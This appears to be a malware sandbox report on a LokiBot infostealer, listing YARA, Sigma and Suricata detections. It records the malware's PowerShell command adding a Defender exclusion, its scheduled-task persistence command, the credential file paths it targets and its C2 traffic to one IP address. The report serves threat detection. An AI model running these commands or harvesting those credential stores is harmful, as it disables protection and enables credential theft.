15.2.Xzacmv.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.Xzacmv.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
15.2.Xzacmv.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
15.2.Xzacmv.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
15.2.Xzacmv.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.Xzacmv.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.oAUBqI6vQ7.exe.42ce1d0.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.oAUBqI6vQ7.exe.42e81f0.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
15.2.Xzacmv.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
15.2.Xzacmv.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
15.2.Xzacmv.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.Xzacmv.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
15.2.Xzacmv.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
15.2.Xzacmv.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
15.2.Xzacmv.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
15.2.Xzacmv.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
10.2.Xzacmv.exe.3ac5870.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 63 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oAUBqI6vQ7.exe", ParentImage: C:\Users\user\Desktop\oAUBqI6vQ7.exe, ParentProcessId: 7616, ParentProcessName: oAUBqI6vQ7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe", ProcessId: 7824, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Xzacmv.exe, ParentImage: C:\Users\user\AppData\Roaming\Xzacmv.exe, ParentProcessId: 8160, ParentProcessName: Xzacmv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp", ProcessId: 2816, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oAUBqI6vQ7.exe", ParentImage: C:\Users\user\Desktop\oAUBqI6vQ7.exe, ParentProcessId: 7616, ParentProcessName: oAUBqI6vQ7.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp", ProcessId: 7960, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oAUBqI6vQ7.exe", ParentImage: C:\Users\user\Desktop\oAUBqI6vQ7.exe, ParentProcessId: 7616, ParentProcessName: oAUBqI6vQ7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oAUBqI6vQ7.exe", ProcessId: 7824, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oAUBqI6vQ7.exe", ParentImage: C:\Users\user\Desktop\oAUBqI6vQ7.exe, ParentProcessId: 7616, ParentProcessName: oAUBqI6vQ7.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Xzacmv" /XML "C:\Users\user\AppData\Local\Temp\tmp9E72.tmp", ProcessId: 7960, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:39:30.747575+0100	2024312	1	A Network Trojan was detected	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:31.698159+0100	2024312	1	A Network Trojan was detected	192.168.2.9	49782	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:39:30.033217+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:30.983574+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49782	94.156.177.41	80	TCP
2025-01-10T23:39:31.786336+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:32.762986+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:33.668904+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:34.550687+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:35.593982+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:36.524977+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:37.475403+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:38.368872+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.255080+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:40.181219+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:41.043838+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.946366+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:42.804638+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:43.700209+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:44.571656+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:45.467959+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:46.347914+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.224865+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:48.085557+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.966901+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:49.857189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:50.736564+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:51.608218+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:52.498581+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:53.373246+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:54.280518+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.188309+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:56.120922+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:57.148898+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:58.061788+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.942881+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:59.805268+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:00.712172+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:01.567820+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:02.475547+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:03.338597+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.219923+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:05.091256+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.975511+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:06.861436+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:07.743342+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:08.645278+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:09.491507+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:10.336713+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.244942+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:12.114270+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.999101+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:13.879820+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:14.751608+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:15.631391+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:16.495720+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:17.398131+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:18.418308+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:19.336242+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:20.316028+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.201505+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:22.115264+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:23.003055+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.937030+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:24.962376+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:25.899746+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:26.796508+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:28.348116+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.251180+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:30.129740+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.989628+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:31.883334+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:32.757846+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:33.600822+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:34.524652+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:35.419613+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:36.312373+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.191586+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:38.038961+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.946533+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:39.839305+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:40.741383+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:41.627956+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:42.493662+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:43.387530+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.267924+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:45.492998+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:46.379070+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.277778+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:48.293317+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.166292+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:50.031343+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.883229+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:51.744360+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:52.588350+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:53.449991+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:54.439684+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:55.316604+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.210746+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:57.158429+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:58.050721+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.937068+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:59.854825+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:00.709875+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:01.612216+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.611717+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50082	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:39:32.526294+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:33.496857+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:34.373550+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:35.278795+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:36.347969+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:37.275030+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:38.209511+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:39.065651+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.984096+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49842	94.156.177.41	80	TCP
